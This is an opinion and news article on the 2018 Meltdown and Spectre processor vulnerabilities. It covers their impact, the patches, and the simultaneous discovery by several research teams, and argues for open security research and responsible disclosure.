Major Computer Chip Bugs Show the Need for Open Security Research
Have you heard about "Meltdown" and "Spectre"? Here's what you need to know.
2018 rang in with a bang in the computer security world, as two serious and extensive processor vulnerabilities were discovered in early January. Last week, researchers with Google's Project Zero and various universities and private security shops announced their troubling findings that the majority of the world's computer chips manufactured over the past two decades had been susceptible to two exploits—named "Meltdown" and "Spectre"—for years. (Yes, that means your computer, smartphone, and tablet are affected.)
The researchers who discovered the bugs have assembled a helpful website full of information about the vulnerabilities, with links to incident responses by various technology companies.
Computer programs are not supposed to be able to read certain data from other programs. Yet the Meltdown and Spectre hardware bugs could allow a malicious actor to bypass memory isolation and access "secrets stored in the memory of other running programs"—like passwords, photos, emails, communications, and personal documents.
While serious vulnerabilities affecting browsers and other software are unfortunately rather common, the Spectre and Meltdown bugs are noteworthy both for the extent of their reach and the fact that they affect the very chips that make all of our devices run.
Both exploits affect processors in similar ways, but there are differences between them. The Meltdown vulnerability affects Intel and Apple processors and effectively "melts down" the protections that the hardware normally enforces. Meltdown mostly concerns desktop, laptop, and cloud computers. The Spectre vulnerability, on the other hand, tricks Intel, ARM, and AMD chips into executing commands that could expose sensitive information to other applications. Spectre is a problem for smartphone and tablet users. While patches for both vulnerabilities have been pushed out on the software level, the researchers note that the Spectre bug does not have an easy fix and will "haunt us for some time." (Also noteworthy: the Meltdown patch, called KAISER, may slow down processing speeds by up to 30 percent—an annoying headache that will surely make users grumble.)
Intel's stock price took a mighty hit upon news of the exploits, although the characterization of Meltdown and Spectre as an "Intel bug" is not quite right. The vulnerabilities affect popular chipmakers ARM and AMD as well, not to mention Apple hardware.
Some have speculated that the vulnerabilities will require a complete recall and redesign of how processors are made to fully steel systems against these bugs, perhaps especially so in the case of the tricky Spectre bug. A security alert from US-CERT, the Department of Homeland Security's primary cybersecurity coordination body, notes that "patching may not fully address these vulnerabilities" because they exist "in CPU architecture rather than software." This means that the software fixes pushed so far may only be an intermediary step to a full solution. Yet Intel has perhaps not surprisingly sought to downplay the general threat, stating that a software patch will be sufficient to render their products "immune" from the exploits.
How to protect yourself
So what do the Spectre and Meltdown bugs mean for the average person? Don't panic: it's highly unlikely that hackers would first look to target average Joes like you and I. They would be much more likely to attack the big guys like Amazon Web Services and Microsoft Azure because that's where the money's at. Still, it's always good to be proactive.
If you haven't already, it's probably a good idea to cease sharing sensitive data on compromised devices—which includes basically all computing products, save for perhaps the trusty Nokia 3310—until you verify that the necessary fixes have been installed.
While no known malicious uses of the vulnerabilities have been discovered yet, test cases have been successfully deployed. Technology companies have been scrambling behind the scenes to issue patches before hackers have the chance to do so. Some of these have been automatically pushed out by firms like Apple and Google, but it never hurts to check just to be sure.
Even if the necessary security patches are installed on your device, there is still a chance that issues will remain, or that a hardware recall and replacement is truly needed, or that the patches themselves could be a new vector for another exploit. As such, this should serve as yet another reminder of the importance of our digital hygiene. It is our responsibility to safeguard our own data and ensure that we are being as prudent as possible with our online sharing. You can even use this as an excuse to adopt a late New Year's resolution: take your data protection seriously in 2018!
Why we need open security research
This is not merely a story about our vulnerable digital reality. It is equally a case study of the importance of open security research, and a cautionary tale about what can happen if vulnerability disclosure is concealed or even weaponized.
Journalist Andy Greenberg of WIRED has published an excellent exposition of how disparate teams of security researchers across the globe independently discovered the chip bugs. He notes curious coincidence that four separate groups of computer scientists should somehow all locate the world's worst CPU vulnerabilities within weeks of each other. After all, these bugs may have existed for decades. Why would there be a veritable tsunami of disclosures in this particular year?
Greenberg traces the genesis of this particular "bug collision"—or simultaneous vulnerability discovery—to a blogpost by security researcher Anders Fogh last July, where he brainstormed how industry standard microprocessor features to improve speed, called "speculative execution," could be exploited to undermine security. This got the gears turning for other researchers who started to noodle exactly how processors could be vulnerable in other ways. Months later, two unique groups of researchers Graz the University of Technology in Austria and the German security firm Cyberus applied Fogh's techniques and discovered the troubling bugs.
Meanwhile, a 22-year-old hacker named Jann Horn who recently started a stint at Google's bug-finding Project Zero had independently discovered the vulnerabilities weeks before Fogh's clarion call while poring over Intel's chip documentation for an unrelated project. And Paul Kocher, founder of San Fransisco's Cryptography Research, likewise channeled his own suspicions about speculative execution into identifying the bugs without input from any other team.
When these researchers went to responsibly report their findings to chip makers like Intel, they were surprised to learn that others had preceded them. It looks like industry developers from Intel, Amazon, and Google were also aware of the issue in October, as their contributions to the popular Linux kernel mailing list suggested they were already interested in the KAISER patch.
On the one hand, this is a story about what is possible when bright and public-minded security researchers are free to tinker with systems and responsibly report the vulnerabilities they find. But on the other hand, it raises uncomfortable questions about the extent of such deeply-threatening vulnerabilities and whether other, less public-minded parties may have been exploiting them all along.
The researchers surveyed in Greenberg's articles relate their creepy feelings that they were surely not the first to discover these bugs. Many of them are quite certain that intelligence agencies were aware of the flaws, and perhaps even exploited them for years. For what it's worth, the National Security Agency denies that they even knew about the flaws, let alone abused them. Yet many Americans will surely find this hard to believe.
Regardless of whether or not intelligence agencies exploited these particular bugs, the fact of the matter is that they have stockpiled and deployed a trove of zero-day vulnerabilities for years in the service of surveillance missions. As the recent Shadow Brokers saga illustrates, these "assets" can shortly turn to dangerous liabilities should they be released into the wild. This kind of short-sighted bug hiding ultimately makes everyone less safe online, and can ironically even undermine the intelligence goals for which they were initially employed.
The bottom line is that security is hard. We need to both actively manage our own data sharing and promote a policy environment which protects and encourages responsible vulnerability disclosure. We can't afford to wait for the next security catastrophe before we start taking these necessary steps.
Show Comments (31)